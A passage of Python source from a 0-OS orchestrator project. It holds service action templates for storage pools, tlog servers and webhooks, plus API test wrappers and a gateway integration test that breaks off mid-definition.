if interface.startswith('cont'):
container_id = interface.split('-')[0].replace('cont', '')
for container in node.containers.list():
if str(container.id) == container_id:
container_service = service.aysrepo.serviceGet(role='container', instance=container.name)
container_service.model.data.status = 'networkKilled'
container_service.saveAll()
return
else:
vms = node.client.kvm.list()
for vm in vms:
if interface in vm['ifctargets']:
vm_service = service.aysrepo.serviceGet(role='vm', instance=vm['name'])
vm_service.model.data.status = 'networkKilled'
vm_service.saveAll()
return
job.logger.info('Failed to find vm/container interface matching %s' % interface)
def ork_handler(job):
import json
from zeroos.orchestrator.utils import send_event
message = job.model.args.get('message')
if not message:
return
message = json.loads(message)
send_event('ork', message, job.service.aysrepo)
if message['event'] == 'NIC_SHUTDOWN':
nic_shutdown(job, message)
elif message['event'] == 'VM_QUARANTINE' and message['state'] == 'WARNING':
job.logger.info('VM %s exceeded cpu threshold and will be quarantined soon' % message['name'])
elif message['event'] == 'VM_QUARANTINE' and message['state'] == 'SUCCESS':
job.logger.info('Vm %s has been quarantined' % message['name'])
elif message['event'] == 'VM_UNQUARANTINE' and message['state'] == 'SUCCESS':
job.logger.info('Vm %s has been released from quarantine' % message['name'])
def start_vm(job, vm):
import asyncio
from zeroos.orchestrator.configuration import get_jwt_token
if vm.model.data.status == 'running':
job.context['token'] = get_jwt_token(job.service.aysrepo)
asyncio.ensure_future(vm.asyncExecuteAction('start', context=job.context), loop=job.service._loop)
def shutdown_vm(job, vm):
import asyncio
from zeroos.orchestrator.configuration import get_jwt_token
if vm.model.data.status == 'running':
job.context['token'] = get_jwt_token(job.service.aysrepo)
asyncio.ensure_future(vm.asyncExecuteAction('shutdown', context=job.context), loop=job.service._loop)
def vm_handler(job):
import json
import asyncio
message = job.model.args.get('message')
if not message:
return
message = json.loads(message)
vm = job.service.aysrepo.serviceGet(role='vm', instance=message['name'])
if not vm:
return
if message['event'] == 'stopped' and message['detail'] == 'failed':
asyncio.ensure_future(start_vm(job, vm))
if message['event'] == 'stopped' and message['detail'] == 'shutdown':
asyncio.ensure_future(shutdown_vm(job, vm))
def processChange(job):
service = job.service
args = job.model.args
node_data = service.model.data.to_dict()
if 'forceReboot' in args and node_data.get('forceReboot') != args['forceReboot']:
service.model.data.forceReboot = args['forceReboot']
service.saveAll()
```
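The watchdog `callback` above routes each pubsub message by splitting the job id into `<role>.<sub_id>`, matching it against `watched_roles`, and deriving the end-of-stream flag by bit masking. A minimal sketch of that dispatch decision, with an invented job id and flag value:

```python
import re

watched_roles = {
    'nbdserver': {'level': 20, 'message': (re.compile('.*'),), 'eof': True},
}

def should_dispatch(jobid, level, message, flag):
    if '.' not in jobid:
        return False
    role, sub_id = jobid.split('.', 1)
    if (role not in watched_roles
            or watched_roles[role].get('level', level) != level
            or watched_roles[role].get('sub_id', sub_id) != sub_id):
        return False
    eof = flag & 0x6 != 0                                   # bits 1 and 2 signal end of stream
    matched = any(m.match(message) for m in watched_roles[role].get('message', ()))
    return matched or (watched_roles[role]['eof'] and eof)

print(should_dispatch('nbdserver.vdisk1', 20, 'process exited', 0x2))   # True
```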
#### File: templates/storagepool/actions.py
```python
from js9 import j
def input(job):
service = job.service
for notempty in ['metadataProfile', 'dataProfile', 'devices']:
if job.model.args.get(notempty, "") == "":
raise j.exceptions.Input("{} argument cannot be empty, cannot continue init of {}".format(notempty, service))
def install(job):
from zeroos.orchestrator.sal.Node import Node
from zeroos.orchestrator.configuration import get_jwt_token
job.context['token'] = get_jwt_token(job.service.aysrepo)
service = job.service
pservice = service.parent
node = Node.from_ays(pservice, job.context['token'])
devices = [d.device for d in service.model.data.devices]
name = service.name
dataProfile = str(service.model.data.dataProfile)
metadataProfile = str(service.model.data.metadataProfile)
mountpoint = str(service.model.data.mountpoint) or None
created = False
try:
pool = node.storagepools.get(name)
except ValueError:
# pool does not exist, let's create it
pool = node.storagepools.create(name, devices, metadataProfile, dataProfile, overwrite=True)
created = True
# mount device
# if the pool is already mounted and the user asked for a specific mountpoint, remount it to the correct location
if pool.mountpoint and mountpoint:
if pool.mountpoint != mountpoint:
pool.umount()
pool.mount(mountpoint)
# if the pool is already mounted and no specific mountpoint was asked, do nothing
if pool.mountpoint and not mountpoint:
pass
# if the pool is not mounted and no mountpoint was specified, use the automatic mount
elif not pool.mountpoint and not mountpoint:
pool.mount()
# if the pool is not mounted and a mountpoint was specified, mount it at the requested location
elif not pool.mountpoint and mountpoint:
pool.mount(mountpoint)
# check whether devices need to be added or removed and whether the profiles still match
if pool.fsinfo['data']['profile'].lower() != dataProfile:
raise RuntimeError("Data profile of storagepool {} does not match".format(name))
if pool.fsinfo['metadata']['profile'].lower() != metadataProfile:
raise RuntimeError("Metadata profile of storagepool {} does not match".format(name))
if not created:
updateDevices(service, pool, devices)
pool.ays.create(service.aysrepo)
def delete(job):
from zeroos.orchestrator.sal.Node import Node
from zeroos.orchestrator.configuration import get_jwt_token
job.context['token'] = get_jwt_token(job.service.aysrepo)
service = job.service
pservice = service.parent
node = Node.from_ays(pservice, job.context['token'])
name = service.name
try:
pool = node.storagepools.get(name)
pool.delete(zero=True)
except ValueError:
# pool does not exist, nothing to do
pass
def updateDevices(service, pool, devices):
pooldevices = set(pool.devices)
requireddevices = set(devices)
def in_pool(device):
for pooldevice in pooldevices:
if pooldevice.startswith(device):
return True
return False
def in_devices(pooldevice):
for device in requireddevices:
if pooldevice.startswith(device):
return True
return False
# add extra devices
extradevices = set()
for device in requireddevices:
if not in_pool(device):
extradevices.add(device)
if extradevices:
pool.device_add(*extradevices)
# remove devices
removeddevices = set()
for pooldevice in pooldevices:
if not in_devices(pooldevice):
removeddevices.add(pooldevice)
if removeddevices:
for device in service.model.data.devices:
if device.device in removeddevices:
device.status = 'removing'
pool.device_remove(*removeddevices)
def processChange(job):
from zeroos.orchestrator.sal.Node import Node
from zeroos.orchestrator.configuration import get_jwt_token_from_job
service = job.service
if service.model.actionsState['install'] in ['new', 'scheduled']:
return
args = job.model.args
category = args.pop('changeCategory')
if category == "dataschema":
pservice = service.parent
node = Node.from_ays(pservice, get_jwt_token_from_job(job))
try:
pool = node.storagepools.get(service.name)
devices = [d['device'] for d in args['devices']]
updateDevices(service, pool, devices)
pool.ays.create(service.aysrepo)
except ValueError:
job.logger.error("pool %s doesn't exist, can't update devices", service.name)
def monitor(job):
from zeroos.orchestrator.sal.Node import Node
from zeroos.orchestrator.configuration import get_jwt_token
service = job.service
if service.model.actionsState['install'] == 'ok':
pservice = service.parent
token = get_jwt_token(job.service.aysrepo)
node = Node.from_ays(pservice, token)
try:
pool = node.storagepools.get(service.name)
if not pool.mountpoint:
job.context['token'] = token
install(job)
devices, status = pool.get_devices_and_status()
service.model.data.init('devices', len(devices))
for i, device in enumerate(devices):
service.model.data.devices[i] = device
service.model.data.status = status
service.saveAll()
except ValueError:
job.logger.error("pool %s doesn't exist, can't monitor pool", service.name)
```
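`updateDevices` above compares the devices currently in the btrfs pool against the requested ones using prefix matching, presumably because the pool reports partitions (e.g. `/dev/sda1`) created on top of the requested disks (e.g. `/dev/sda`). A standalone sketch of that reconciliation with made-up device names:

```python
pooldevices = {'/dev/sda1', '/dev/sdb1'}   # devices currently part of the pool (example values)
requested = {'/dev/sda', '/dev/sdc'}       # devices the service model asks for (example values)

# devices to add: requested disks with no matching pool device
extradevices = {d for d in requested if not any(p.startswith(d) for p in pooldevices)}
# devices to remove: pool devices that no requested disk accounts for
removeddevices = {p for p in pooldevices if not any(p.startswith(d) for d in requested)}

print(sorted(extradevices))     # ['/dev/sdc']  -> pool.device_add(...)
print(sorted(removeddevices))   # ['/dev/sdb1'] -> pool.device_remove(...)
```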
#### File: templates/tlogserver/actions.py
```python
from js9 import j
def get_container(service, password):
from zeroos.orchestrator.sal.Container import Container
return Container.from_ays(service.parent, password, logger=service.logger)
def is_port_listening(container, port, timeout=30, listen=True):
import time
start = time.time()
while start + timeout > time.time():
if port not in container.node.freeports(port, nrports=3):
return True
if not listen:
return False
time.sleep(0.2)
return False
def is_job_running(container, cmd='/bin/tlogserver'):
try:
for job in container.client.job.list():
arguments = job['cmd']['arguments']
if 'name' in arguments and arguments['name'] == cmd:
return job
return False
except Exception as err:
if "invalid container id" in str(err):
return False
raise
def save_config(job, vdisks=None):
import yaml
from zeroos.orchestrator.sal.ETCD import EtcdCluster
from zeroos.orchestrator.configuration import get_jwt_token
job.context['token'] = get_jwt_token(job.service.aysrepo)
service = job.service
config = {"servers": [service.model.data.bind]}
yamlconfig = yaml.safe_dump(config, default_flow_style=False)
etcd_cluster = service.aysrepo.servicesFind(role='etcd_cluster')[0]
etcd = EtcdCluster.from_ays(etcd_cluster, job.context['token'])
etcd.put(key="%s:cluster:conf:tlog" % service.name, value=yamlconfig)
for vdisk in vdisks:
vdiskstore = vdisk.parent
config = {
"storageClusterID": vdiskstore.model.data.blockCluster,
"tlogServerClusterID": service.name,
"slaveStorageClusterID": vdiskstore.model.data.slaveCluster or "",
}
job.logger.debug("tlogserver %s save config for vdisk %s", service, vdisk)
job.logger.debug(config)
yamlconfig = yaml.safe_dump(config, default_flow_style=False)
etcd.put(key="%s:vdisk:conf:storage:nbd" % vdisk.name, value=yamlconfig)
def install(job):
from zeroos.orchestrator.sal.ETCD import EtcdCluster
from zeroos.orchestrator.configuration import get_jwt_token
job.context['token'] = get_jwt_token(job.service.aysrepo)
service = job.service
etcd_cluster = service.aysrepo.servicesFind(role='etcd_cluster')[0]
etcd_cluster = EtcdCluster.from_ays(etcd_cluster, job.context['token'])
vm = service.consumers['vm'][0]
vdisks = vm.producers.get('vdisk', [])
container = get_container(service, job.context['token'])
config = {
'storageClusters': set(),
'data-shards': 0,
'parity-shards': 0,
}
backup = False
for vdiskservice in vdisks:
vdiskstore = vdiskservice.parent
objectcluster = vdiskstore.model.data.objectCluster
if objectcluster and objectcluster not in config['storageClusters']:
data_shards, parity_shards = get_storagecluster_config(job, objectcluster)
config['storageClusters'].add(objectcluster)
config['data-shards'] += data_shards
config['parity-shards'] += parity_shards
if vdiskstore.model.data.slaveCluster:
backup = True
if not config['storageClusters']:
return
save_config(job, vdisks)
data_shards = config.pop('data-shards')
parity_shards = config.pop('parity-shards')
# check if we consume another tlogserver that we need to sync with at startup
tlogWaitAddr = None
if 'tlogserver' in service.producers:
waitTlogServer_service = service.producers['tlogserver'][0]
tlogWaitAddr = waitTlogServer_service.model.data.waitListenBind
bind = service.model.data.bind
waitListenBind = service.model.data.waitListenBind
if not is_port_listening(container, int(bind.split(':')[1]), listen=False):
cmd = '/bin/tlogserver \
-id {id} \
-flush-size 128 \
-address {bind} \
-wait-listen-addr {waitListenBind} \
-config "{dialstrings}" \
'.format(id=vm.name,
bind=bind,
waitListenBind=waitListenBind,
dialstrings=etcd_cluster.dialstrings)
if backup:
cmd += ' -with-slave-sync'
if tlogWaitAddr:
cmd += ' -wait-connect-addr {}'.format(tlogWaitAddr)
if service.model.data.acceptAddress:
cmd += ' -accept-address {}'.format(service.model.data.acceptAddress)
job.logger.info("Starting tlog server: %s" % cmd)
container.client.system(cmd, id="{}.{}".format(service.model.role, service.name))
if not is_port_listening(container, int(bind.split(":")[1])):
raise j.exceptions.RuntimeError('Failed to start tlogserver {}'.format(service.name))
service.model.data.status = 'running'
service.saveAll()
tcpsrv = service.producers['tcp'][0]
if tcpsrv.model.data.status == "dropped":
tcpsrv.executeAction('install', context=job.context)
def start(job):
from zeroos.orchestrator.configuration import get_jwt_token
job.context['token'] = get_jwt_token(job.service.aysrepo)
service = job.service
service.executeAction('install', context=job.context)
def get_storagecluster_config(job, storagecluster):
objectcluster_service = job.service.aysrepo.serviceGet(role='storagecluster.object',
instance=storagecluster)
return objectcluster_service.model.data.dataShards, objectcluster_service.model.data.parityShards
def stop(job):
import time
from zeroos.orchestrator.configuration import get_jwt_token
job.context['token'] = get_jwt_token(job.service.aysrepo)
service = job.service
if service.model.data.status != 'running':
return
service.model.data.status = 'halting'
service.saveAll()
container = get_container(service, job.context['token'])
bind = service.model.data.bind
port = int(bind.split(':')[1])
tlogjob = is_job_running(container)
if tlogjob:
job.logger.info("killing job {}".format(tlogjob['cmd']['arguments']['name']))
container.client.job.kill(tlogjob['cmd']['id'])
job.logger.info("wait for tlogserver to stop")
for i in range(60):
time.sleep(1)
if not is_port_listening(container, port):
break
else:
raise j.exceptions.RuntimeError("Failed to stop Tlog server")
# after stop, in case this service was consumed by another tlog server for synchronisation,
# clean the consumer relation because the sync is done just before the stop;
# the relation doesn't need to exist anymore.
for consumer in service.consumers.get('tlogserver', []):
service.model.consumerRemove(consumer)
service.model.data.status = 'halted'
service.saveAll()
tcpsrv = service.producers['tcp'][0]
if tcpsrv.model.data.status == "opened":
tcpsrv.executeAction('drop', context=job.context)
def monitor(job):
from zeroos.orchestrator.configuration import get_jwt_token
service = job.service
if not service.model.actionsState['install'] == 'ok':
return
if str(service.model.data.status) != 'running':
return
bind = service.model.data.bind
port = int(bind.split(':')[1])
container = get_container(service, get_jwt_token(job.service.aysrepo))
if is_port_listening(container, port):
return
service.executeAction('start', context={"token": get_jwt_token(job.service.aysrepo)})
def watchdog_handler(job):
import asyncio
loop = j.atyourservice.server.loop
service = job.service
if str(service.model.data.status) != 'running':
return
eof = job.model.args['eof']
if eof:
asyncio.ensure_future(service.asyncExecuteAction('start', context=job.context), loop=loop)
```
#### File: templates/webhook/actions.py
```python
def processChange(job):
service = job.service
args = job.model.args
if args.pop('changeCategory') != 'dataschema':
return
if 'url' in args:
service.model.data.url = args['url']
if 'eventtypes' in args:
service.model.data.eventtypes = args['eventtypes']
service.saveAll()
```
#### File: framework/orchestrator_apis/bridges_apis.py
```python
from framework.orchestrator_apis import *
from framework.orchestrator_base import OrchestratorBase
import random
class BridgesAPI(OrchestratorBase):
def __init__(self, orchestrator_driver):
self.orchestrator_driver = orchestrator_driver
self.orchestrator_client = self.orchestrator_driver.orchestrator_client
self.createdbridges = []
@catch_exception_decoration
def get_nodes_bridges(self, nodeid):
return self.orchestrator_client.nodes.ListBridges(nodeid=nodeid)
@catch_exception_decoration
def get_nodes_bridges_bridgeid(self, nodeid, bridgeid):
return self.orchestrator_client.nodes.GetBridge(nodeid=nodeid, bridgeid=bridgeid)
@catch_exception_decoration_return
def post_nodes_bridges(self, node_id, **kwargs):
temp = random.randint(1, 254)
temp2 = random.randint(1, 254)
if 'networkMode' not in kwargs.keys():
kwargs['networkMode'] = self.random_choise(["none", "static", "dnsmasq"])
settings_draft = {"none": {},
"static": {"cidr": "192.%i.%i.%i/24" % (random.randint(1, 254), random.randint(1, 254), random.randint(1, 254))},
"dnsmasq": {"cidr": "192.%i.%i.1/24" % (temp, temp2),
"start": "192.%i.%i.2" % (temp, temp2),
"end": "192.%i.%i.254" % (temp, temp2)}}
data = {"name": self.random_string(),
"hwaddr": self.randomMAC(),
"networkMode": kwargs['networkMode'],
"nat": self.random_choise(([False, True])),
"setting": settings_draft[kwargs['networkMode']]
}
data = self.update_default_data(default_data=data, new_data=kwargs)
response = self.orchestrator_client.nodes.CreateBridge(nodeid=node_id,
data=data)
if response.status_code == 201:
self.createdbridges.append({"node": node_id, "name": data["name"]})
return response, data
@catch_exception_decoration
def delete_nodes_bridges_bridgeid(self, nodeid, bridgeid):
response = self.orchestrator_client.nodes.DeleteBridge(nodeid=nodeid, bridgeid=bridgeid)
if response.status_code == 204:
self.createdbridges.remove({"node": nodeid, "name": bridgeid})
return response
```
#### File: framework/orchestrator_apis/health_apis.py
```python
from framework.orchestrator_apis import *
from framework.orchestrator_base import OrchestratorBase
class HealthcheckAPI:
def __init__(self, orchestrator_driver):
self.orchestrator_driver = orchestrator_driver
self.orchestrator_client = self.orchestrator_driver.orchestrator_client
@catch_exception_decoration
def get_all_nodes_health(self):
return self.orchestrator_client.health.ListNodesHealth()
@catch_exception_decoration
def get_node_health(self, nodeid):
return self.orchestrator_client.health.ListNodeHealth(nodeid=nodeid)
@catch_exception_decoration
def get_storageclusters_health(self):
return self.orchestrator_client.health.ListStorageClustersHealth()
@catch_exception_decoration
def get_storagecluster_health(self, storageclusterid):
return self.orchestrator_client.health.ListStorageClusterHealth(storageclusterid=storageclusterid)
```
#### File: framework/orchestrator_apis/storageclusters_apis.py
```python
from framework.orchestrator_apis import *
from framework.orchestrator_base import OrchestratorBase
class Storageclusters(OrchestratorBase):
def __init__(self, orchestrator_driver):
self.orchestrator_driver = orchestrator_driver
self.orchestrator_client = self.orchestrator_driver.orchestrator_client
@catch_exception_decoration_return
def post_storageclusters(self, nodes, **kwargs):
data = {
"label": self.random_string(),
"servers": 1,
"driveType": 'ssd',
"clusterType": "block",
"nodes": nodes
}
data = self.update_default_data(default_data=data, new_data=kwargs)
response = self.orchestrator_client.storageclusters.DeployNewCluster(data=data)
return response, data
@catch_exception_decoration
def get_storageclusters(self):
return self.orchestrator_client.storageclusters.ListAllClusters()
@catch_exception_decoration
def get_storageclusters_label(self, label):
return self.orchestrator_client.storageclusters.GetClusterInfo(label=label)
@catch_exception_decoration
def delete_storageclusters_label(self, label):
return self.orchestrator_client.storageclusters.KillCluster(label=label)
```
#### File: framework/orchestrator_apis/storagepools_apis.py
```python
from framework.orchestrator_apis import *
from framework.orchestrator_base import OrchestratorBase
import random
class StoragepoolsAPI(OrchestratorBase):
def __init__(self, orchestrator_driver):
self.orchestrator_driver = orchestrator_driver
self.orchestrator_client = self.orchestrator_driver.orchestrator_client
@catch_exception_decoration
def get_storagepools(self, nodeid):
return self.orchestrator_client.nodes.ListStoragePools(nodeid=nodeid)
@catch_exception_decoration_return
def post_storagepools(self, node_id, free_devices, **kwargs):
data = {"name": self.random_string(),
"metadataProfile": 'single',
"dataProfile": 'single',
"devices": [random.choice(free_devices)]}
data = self.update_default_data(default_data=data, new_data=kwargs)
response = self.orchestrator_client.nodes.CreateStoragePool(nodeid=node_id, data=data)
return response, data
@catch_exception_decoration
def get_storagepools_storagepoolname(self, nodeid, storagepoolname):
return self.orchestrator_client.nodes.GetStoragePoolInfo(nodeid=nodeid, storagepoolname=storagepoolname)
@catch_exception_decoration
def delete_storagepools_storagepoolname(self, nodeid, storagepoolname):
return self.orchestrator_client.nodes.DeleteStoragePool(nodeid=nodeid, storagepoolname=storagepoolname)
@catch_exception_decoration
def get_storagepools_storagepoolname_devices(self, nodeid, storagepoolname):
return self.orchestrator_client.nodes.ListStoragePoolDevices(nodeid=nodeid, storagepoolname=storagepoolname)
@catch_exception_decoration
def post_storagepools_storagepoolname_devices(self, nodeid, storagepoolname, data):
return self.orchestrator_client.nodes.CreateStoragePoolDevices(nodeid=nodeid, storagepoolname=storagepoolname,
data=data)
@catch_exception_decoration
def get_storagepools_storagepoolname_devices_deviceid(self, nodeid, storagepoolname, deviceuuid):
return self.orchestrator_client.nodes.GetStoragePoolDeviceInfo(nodeid=nodeid, storagepoolname=storagepoolname,
deviceuuid=deviceuuid)
@catch_exception_decoration
def delete_storagepools_storagepoolname_devices_deviceid(self, nodeid, storagepoolname, deviceuuid):
return self.orchestrator_client.nodes.DeleteStoragePoolDevice(nodeid=nodeid, storagepoolname=storagepoolname,
deviceuuid=deviceuuid)
@catch_exception_decoration
def get_storagepools_storagepoolname_filesystems(self, nodeid, storagepoolname):
return self.orchestrator_client.nodes.ListFilesystems(nodeid=nodeid, storagepoolname=storagepoolname)
@catch_exception_decoration_return
def post_storagepools_storagepoolname_filesystems(self, node_id, storagepoolname, **kwargs):
data = {"name": self.random_string(),
"quota": random.randint(0, 10),
"readOnly": False}
data = self.update_default_data(default_data=data, new_data=kwargs)
response = self.orchestrator_client.nodes.CreateFilesystem(nodeid=node_id, storagepoolname=storagepoolname,
data=data)
return response, data
@catch_exception_decoration
def get_storagepools_storagepoolname_filesystems_filesystemname(self, nodeid, storagepoolname, filesystemname):
return self.orchestrator_client.nodes.GetFilesystemInfo(nodeid=nodeid, storagepoolname=storagepoolname,
filesystemname=filesystemname)
@catch_exception_decoration
def delete_storagepools_storagepoolname_filesystems_filesystemname(self, nodeid, storagepoolname, filesystemname):
return self.orchestrator_client.nodes.DeleteFilesystem(nodeid=nodeid, storagepoolname=storagepoolname,
filesystemname=filesystemname)
@catch_exception_decoration
def get_filesystem_snapshots(self, nodeid, storagepoolname, filesystemname):
return self.orchestrator_client.nodes.ListFilesystemSnapshots(nodeid=nodeid, storagepoolname=storagepoolname,
filesystemname=filesystemname)
@catch_exception_decoration_return
def post_filesystems_snapshots(self, nodeid, storagepoolname, filesystemname, **kwargs):
data = {'name': self.random_string()}
data = self.update_default_data(default_data=data, new_data=kwargs)
response = self.orchestrator_client.nodes.CreateSnapshot(nodeid=nodeid, storagepoolname=storagepoolname,
filesystemname=filesystemname,
data=data)
return response, data
@catch_exception_decoration
def get_filesystem_snapshots_snapshotname(self, nodeid, storagepoolname, filesystemname, snapshotname):
return self.orchestrator_client.nodes.GetFilesystemSnapshotInfo(nodeid=nodeid, storagepoolname=storagepoolname,
filesystemname=filesystemname,
snapshotname=snapshotname)
@catch_exception_decoration
def delete_filesystem_snapshots_snapshotname(self, nodeid, storagepoolname, filesystemname, snapshotname):
return self.orchestrator_client.nodes.DeleteFilesystemSnapshot(nodeid=nodeid, storagepoolname=storagepoolname,
filesystemname=filesystemname,
snapshotname=snapshotname)
@catch_exception_decoration
def post_filesystem_snapshots_snapshotname_rollback(self, nodeid, storagepoolname, filesystemname, snapshotname,
data={}):
return self.orchestrator_client.nodes.RollbackFilesystemSnapshot(nodeid=nodeid, storagepoolname=storagepoolname,
filesystemname=filesystemname,
snapshotname=snapshotname,
data=data)
```
#### File: test_suite/framework/orchestrator_driver.py
```python
from framework.orchestrator_apis.bridges_apis import BridgesAPI
from framework.orchestrator_apis.containers_apis import ContainersAPI
from framework.orchestrator_apis.gateways_apis import GatewayAPI
from framework.orchestrator_apis.nodes_apis import NodesAPI
from framework.orchestrator_apis.storageclusters_apis import Storageclusters
from framework.orchestrator_apis.storagepools_apis import StoragepoolsAPI
from framework.orchestrator_apis.vms_apis import VmsAPI
from framework.orchestrator_apis.vdisks_apis import VDisksAPIs
from framework.orchestrator_apis.health_apis import HealthcheckAPI
from framework.orchestrator_apis.zerotiers_apis import ZerotiersAPI
from framework.orchestrator_apis.backup_apis import BackupAPI
from framework.orchestrator_apis.graphs_apis import GraphsAPI
from zeroos.orchestrator import client
from testconfig import config
class OrchasteratorDriver:
api_base_url = config['main']['api_base_url']
client_id = config['main']['client_id']
client_secret = config['main']['client_secret']
organization = config['main']['organization']
zerotier_token = config['main']['zerotier_token']
vm_username = config['main']['vm_username']
vm_password = config['main']['vm_password']
def __init__(self):
self.JWT = None
self.orchestrator_client = client.APIClient(self.api_base_url)
self.refresh_jwt()
self.bridges_api = BridgesAPI(self)
self.container_api = ContainersAPI(self)
self.gateway_api = GatewayAPI(self)
self.nodes_api = NodesAPI(self)
self.storagepools_api = StoragepoolsAPI(self)
self.storageclusters_api = Storageclusters(self)
self.vdisks_api = VDisksAPIs(self)
self.vms_api = VmsAPI(self)
self.zerotiers_api = ZerotiersAPI(self)
self.backup_api = BackupAPI(self)
self.healthcheck_api = HealthcheckAPI(self)
self.graph_apis = GraphsAPI(self)
self.nodes_info = self.get_node_info()
def get_jwt(self):
auth = client.oauth2_client_itsyouonline.Oauth2ClientItsyouonline()
response = auth.get_access_token(self.client_id, self.client_secret,
scopes=['user:memberof:%s' % self.organization],
audiences=[])
return response.content.decode('utf-8')
def refresh_jwt(self):
self.JWT = self.get_jwt()
self.orchestrator_client.set_auth_header("Bearer %s" % self.JWT)
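# Collect id/ip/status/hostname for every node that is not halted; tests use this list to pick target nodes.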
def get_node_info(self):
nodes_info = []
response = self.nodes_api.get_nodes()
for node in response.json():
if node['status'] == 'halted':
continue
nodes_info.append({"id": node['id'],
"ip": node['ipaddress'],
"status": node['status'],
"hostname":node['hostname']})
return nodes_info
```
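A minimal sketch of how tests are expected to bootstrap the driver, assuming `config['main']` has been filled in by testconfig; the node lookup mirrors `get_node_info` above.

```python
# Hypothetical usage: build the driver and query the first running node it discovered.
driver = OrchasteratorDriver()
node = driver.nodes_info[0]
response = driver.nodes_api.get_nodes_nodeid(node_id=node['id'])
print(response.status_code, node['hostname'])
```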
#### File: testcases/advanced_tests/test03_gws_apis.py
```python
import random, time
from testcases.testcases_base import TestcasesBase
import unittest
class TestGatewayAPICreation(TestcasesBase):
def setUp(self):
super().setUp()
self.core0_client.create_ovs_container()
self.core0_client.timeout = 30
self.flist = 'https://hub.gig.tech/gig-official-apps/ubuntu1604.flist'
self.container_body = {"name": self.rand_str(),
"hostname": self.rand_str(),
"flist": self.flist}
def tearDown(self):
self.lg.info(' [*] Delete all created {} gateways'.format(self.nodeid))
attributes = self.__dict__.keys()
if 'data' in attributes:
if self.data:
self.gateways_api.delete_nodes_gateway(self.nodeid, self.data['name'])
self.lg.info(' [*] TearDown:delete all created container ')
if 'container_data' in attributes:
if self.container_data:
self.containers_api.delete_containers_containerid(self.nodeid,
self.container_data['name'])
self.lg.info(' [*] TearDown:delete all created bridges ')
if 'bridge_data' in attributes:
if self.bridge_data:
self.bridges_api.delete_nodes_bridges_bridgeid(self.nodeid,
self.bridge_data['name'])
super().tearDown()
def create_vm(self, nics):
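# Helper: reuse an existing storage cluster (or deploy one), create a boot vdisk, then boot a VM with the given nics.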
response = self.storageclusters_api.get_storageclusters()
self.assertEqual(response.status_code, 200)
storageclusters = response.json()
if storageclusters:
storagecluster = storageclusters[-1]
else:
free_disks = self.core0_client.getFreeDisks()
if free_disks == []:
self.skipTest(' [*] no free disks to create storagecluster.')
self.lg.info(' [*] Deploy new storage cluster (SC0).')
response, data = self.storageclusters_api.post_storageclusters(node_id=self.nodeid)
self.assertEqual(response.status_code, 201)
storagecluster = data['label']
self.lg.info(' [*] Create new vdisk.')
response, data = self.vdisks_api.post_vdisks(storagecluster=storagecluster, size=15, blocksize=4096, type='boot')
boot_disk = data['id']
self.lg.info(' [*] Create virtual machine (VM0) on node (N0)')
disks = [{"vdiskid": boot_disk, "maxIOps": 2000}]
response, data = self.vms_api.post_nodes_vms(node_id=self.nodeid, memory=1024, cpu=1, nics=nics, disks=disks)
self.assertEqual(response.status_code, 201)
return data
def test001_create_gateway_with_xlan_xlan_container(self):
""" GAT-123
**Test Scenario:**
#. Get random node (N0), should succeed.
#. Create gateway with Xlan and Xlan as nics on node (N0), should succeed.
#. Bind a new container to Xlan(1).
#. Bind a new container to Xlan(2).
#. Make sure that those two containers can ping each other.
"""
self.lg.info(' [*] Create gateway with xlan as nics on node (N0), should succeed')
nics_type = [{
'type': random.choice(['vlan', 'vxlan']),
'gateway': True,
'dhcp': False,
'bridge_name': '',
'zerotierbridge': False
},
{
'type': random.choice(['vlan', 'vxlan']),
'gateway': False,
'dhcp': False,
'bridge_name': '',
'zerotierbridge': ''
},
{
'type': random.choice(['vlan', 'vxlan']),
'gateway': False,
'dhcp': False,
'bridge_name': '',
'zerotierbridge': ''
}
]
nics = self.get_gateway_nic(nics_types=nics_type)
self.response, self.data = self.gateways_api.post_nodes_gateway(self.nodeid, nics=nics)
self.assertEqual(self.response.status_code, 201)
self.lg.info(' [*] Bind a new container to vlan(1)')
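# The cidr slicing below assumes a gateway CIDR such as '192.168.10.1/24':
# [:-3] drops '/24' to get the gateway IP, and [:-4] + '10/24' builds a host address in the same subnet.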
nics_container = [{'type': nics[1]['type'],
'id': nics[1]['id'],
'config': {'dhcp': False,
'gateway': nics[1]['config']['cidr'][:-3],
'cidr': nics[1]['config']['cidr'][:-4] + '10/24'}
}]
uid_1 = self.core0_client.client.container.create(self.flist, nics=nics_container).get()
container_1 = self.core0_client.client.container.client(int(uid_1))
self.lg.info(' [*] Bind a new container to vlan(2)')
nics_container = [{'type': nics[2]['type'],
'id': nics[2]['id'],
'config': {'dhcp': False,
'gateway': nics[2]['config']['cidr'][:-3],
'cidr': nics[2]['config']['cidr'][:-4] + '10/24'}
}]
uid = self.core0_client.client.container.create(self.flist, nics=nics_container).get()
container_2 = self.core0_client.client.container.client(int(uid))
time.sleep(5)
self.lg.info(' [*] Make sure that those two containers can ping each others')
response = container_1.bash('ping -w5 %s' % nics[2]['config']['cidr'][:-4] + '10').get()
self.assertEqual(response.state, 'SUCCESS')
response = container_2.bash('ping -w5 %s' % nics[1]['config']['cidr'][:-4] + '10').get()
self.assertEqual(response.state, 'SUCCESS')
self.core0_client.client.container.terminate(int(uid_1))
self.core0_client.client.container.terminate(int(uid))
@unittest.skip('ssh to vm issue')
def test003_create_gateway_with_xlan_xlan_vm(self):
""" GAT-125
**Test Scenario:**
#. Get random node (N0), should succeed.
#. Create gateway with vlan and vlan as nics on node (N0), should succeed.
#. Bind a new vm to vlan(1).
#. Bind a new vm to vlan(2).
#. Make sure that those two containers can ping each other.
"""
nics_type = [{
'type':'bridge',
'gateway': True,
'dhcp': False,
'bridge_name': '',
'zerotierbridge': False
},
{
'type': random.choice(['vlan', 'vxlan']),
'gateway': False,
'dhcp': True,
'bridge_name': '',
'zerotierbridge': ''
},
{
'type': random.choice(['vlan', 'vxlan']),
'gateway': False,
'dhcp': True,
'bridge_name': '',
'zerotierbridge': ''
}
]
nics = self.get_gateway_nic(nics_types=nics_type)
vm1_mac_addr = nics[1]['dhcpserver']['hosts'][1]['macaddress']
vm1_ip_addr = nics[1]['dhcpserver']['hosts'][1]['ipaddress']
vm2_mac_addr = nics[2]['dhcpserver']['hosts'][1]['macaddress']
vm2_ip_addr = nics[2]['dhcpserver']['hosts'][1]['ipaddress']
test_container_mac_addr = nics[1]['dhcpserver']['hosts'][0]['macaddress']
nics[2]['dhcpserver']['hosts'][0]['macaddress'] = test_container_mac_addr
## set cloudinit
cloudinit = {"chpasswd": {"expire": false},
"ssh_pwauth":true, "users":
